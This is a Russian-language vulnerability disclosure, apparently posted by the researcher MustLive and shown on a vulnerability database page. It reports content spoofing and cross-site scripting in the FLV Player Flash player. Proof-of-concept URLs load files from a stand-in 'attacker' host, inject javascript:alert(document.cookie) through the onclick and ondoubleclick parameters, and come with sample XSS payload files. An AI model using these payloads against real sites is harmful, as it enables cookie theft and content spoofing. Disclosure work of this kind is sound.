logo
DATABASE RESOURCES PRICING ABOUT US

Уязвимости в FLV Player

Description

Здравствуйте 3APA3A! Сообщаю вам о найденных мною Content Spoofing и Cross-Site Scripting уязвимостях в флеш видео плеере FLV Player. Content Spoofing (WASC-12): Флешки плеера FLV Player принимают произвольные адреса в параметре configxml, что позволяет подделать содержимое флешки - например, указав адрес с файлом конфигурации с другого сайта. http://site/player_flv.swf?configxml=http://attacker/1.xml http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml http://site/player_flv_multi.swf?configxml=http://attacker/1.xml Флешки плеера FLV Player принимают произвольные адреса в параметре config, что позволяет подделать содержимое флешки - например, указав адрес с файлом конфигурации с другого сайта. http://site/player_flv.swf?config=http://attacker/1.txt http://site/player_flv_maxi.swf?config=http://attacker/1.txt http://site/player_flv_multi.swf?config=http://attacker/1.txt Флешки плеера FLV Player позволяют подделать все важные параметры, в том числе flv и startimage, и при этом принимают произвольные адреса в параметрах flv и startimage, что позволяет подделать содержимое флешки - например, указав адреса видео и изображения с другого сайта. А для указания ссылки на произвольный сайт можно использовать параметры onclick и ondoubleclick. http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg http://site/player_flv_mini.swf?flv=http://attacker/1.flv XSS (WASC-08): http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie) http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie) http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(documentcookie) http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie) http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml Файл xss.xml: <?xml version="1.0" encoding="UTF-8"?> <config> <param name="onclick" value="javascript:alert(document.cookie)" /> <param name="ondoubleclick" value="javascript:alert(document.cookie)" /> </config> http://site/player_flv_maxi.swf?config=http://attacker/xss.txt http://site/player_flv_multi.swf?config=http://attacker/xss.txt Файл xss.txt: onclick=javascript:alert(document.cookie) ondoubleclick=javascript:alert(document.cookie) Уязвимы версии MINI, NORMAL, MAXI и MULTI плеера. Замечу, что версия NORMAL встречается под именами player_flv.swf и player_flv_classic.swf. Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/5098/ Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua